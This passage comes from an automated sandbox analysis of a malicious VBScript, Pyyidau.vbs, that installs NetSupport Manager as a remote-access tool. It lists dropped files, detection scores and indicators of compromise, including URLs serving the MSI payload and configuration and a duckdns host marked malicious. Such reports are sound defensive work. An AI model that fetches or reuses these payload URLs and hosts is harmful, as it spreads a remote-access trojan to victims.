(likely due to code injection or exploit) 46->133 135 Windows Scripting host queries suspicious COM object (likely to drop second stage) 46->135 61 msiexec.exe 46->61         started        63 conhost.exe 53->63         started        file13 signatures14 process15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Pyyidau.vbs16%ReversingLabsScript-WScript.Trojan.Snake
                                Pyyidau.vbs26%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXE3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe5%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL5%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL8%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe12%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dll4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys2%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe8%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.microsoft.co-0%Avira URL Cloudsafe
                                https://okolinabeauty.com/choh/NSM.lic0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp1110%Avira URL Cloudsafe
                                https://okolinabeauty.com/choh/Client32.ini0%Avira URL Cloudsafe
                                http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS0%Avira URL Cloudsafe
                                http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI0%Avira URL Cloudsafe
                                http://62.172.138.12/url_redirect.htm#The0%Avira URL Cloudsafe
                                https://netsupportschool.com/whats_newAn0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESU0%Avira URL Cloudsafe
                                https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h0%Avira URL Cloudsafe
                                http://schemas.microsoN0%Avira URL Cloudsafe
                                http://localhost/ApprovedWebList.htmPrintSurveyInternet60%Avira URL Cloudsafe
                                https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe0%Avira URL Cloudsafe
                                https://www.netsupportschool.com/ios-android/1110%Avira URL Cloudsafe
                                https://okolinabeauty.com/choh/vrep.msi0%Avira URL Cloudsafe
                                http://www.acer-group.com/public/index/privacy.htm%scountry.dat0%Avira URL Cloudsafe
                                http://www.idk.co.jp0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.comm0%Avira URL Cloudsafe
                                http://www.netsupportsoftware.com/support0%Avira URL Cloudsafe
                                https://okolinabeauty.com/0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.0.231
                                		truefalse
                                  		high
                                  okolinabeauty.com
                                  		176.126.113.166
                                  		truetrue
                                    		unknown
                                    megaeth1337.duckdns.org
                                    		185.170.144.66
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://geo.netsupportsoftware.com/location/loca.aspfalse
                                        		high
                                        https://okolinabeauty.com/choh/Client32.initrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://okolinabeauty.com/choh/NSM.lictrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://okolinabeauty.com/choh/vrep.msitrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.netsupportsoftware.comwscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2484140065.000000000309A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netJPyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.pci.co.uk/supportsupportwscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, checkdvd.exe, 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, MSI3FCC.tmp, 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, winst64.exe, 00000021.00000000.2613701112.00007FF778F25000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2616022842.00007FF778F25000.00000004.00000001.01000000.0000000F.sdmp, MSI51C1.tmp, 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, pcicfgui_client.exe, 00000024.00000002.2676316225.000000006A967000.00000004.00000001.01000000.0000001F.sdmp, pcicfgui_client.exe, 00000024.00000002.2676556252.000000006A98E000.00000004.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmpfalse
                                              		high
                                              http://crl.microsoftPyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.netsupportschool.com/tutor-assistant.asp111winst64.exe, 00000021.00000002.2616022842.00007FF778F25000.00000004.00000001.01000000.0000000F.sdmp, pcicfgui_client.exe, 00000024.00000002.2676556252.000000006A98E000.00000004.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://contoso.com/LicensePyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.hpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp, client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drfalse
                                                    		high
                                                    https://activate.netsupportsoftware.com/updatepcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                      		high
                                                      http://%s/favicon.icoshcore.dllGetDpiForMonitorPCIpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/odirmwscript.exe, 00000000.00000002.1750132291.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718074541.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719233043.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://62.172.138.12/url_redirect.htm#Thepcicfgui_client.exe, 00000024.00000002.2676926399.000000006B852000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://github.com/mgravell/protobuf-netiPyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://netsupportschool.com/whats_newAnpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://geo.netsupportsoftware.com/location/latlong.asp?lat=%s&lng=%s&lang=%sGetpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                            		high
                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                              		high
                                                              https://aka.ms/pscore6lBPyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockSpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.microsoft.co-Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESUpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://stackoverflow.com/q/11564914/23354;Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nuget.org/nuget.exePyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.intel.com/support/eduhttp://www.hp.com/go/hpclassroommanagerpEventDatam_pExhibitingm_pExhpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                        		high
                                                                        https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSepcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.idk.co.jppcicfgui_client.exe, 00000024.00000002.2676926399.000000006B559000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.google.compcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.flexerasoftware.com0wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                                              		high
                                                                              http://www.netsupportschool.com/tutor-assistant.aspwscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615789024.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615749480.0000000002680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.autoitscript.com/autoit3/Jclient32.exe, 00000028.00000002.2765669565.0000000007A47000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2809017512.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2809017512.0000000005A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://nuget.org/NuGet.exePyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.pci.co.uk/supportwscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615789024.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615749480.0000000002680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/Vh5j3kswscript.exe, 00000000.00000002.1750132291.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718074541.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719233043.000001B89C2BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://activate.netsupportsoftware.com/update/?s=%s?s=1234%s5678noactlcpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                          		high
                                                                                          https://stackoverflow.com/q/14436606/23354Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp, Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://pesterbdd.com/images/Pester.pngPyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.acer-group.com/public/index/privacy.htm%scountry.datpcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlPyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://ocsp.thawte.com0wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                                                                  		high
                                                                                                  https://contoso.com/IconPyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://github.com/mgravell/protobuf-netPyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.autoitscript.com/autoclient32.exe, 00000028.00000002.2763417509.0000000005BC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.microsoNclient32.exe, 00000028.00000002.2766139877.0000000007E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
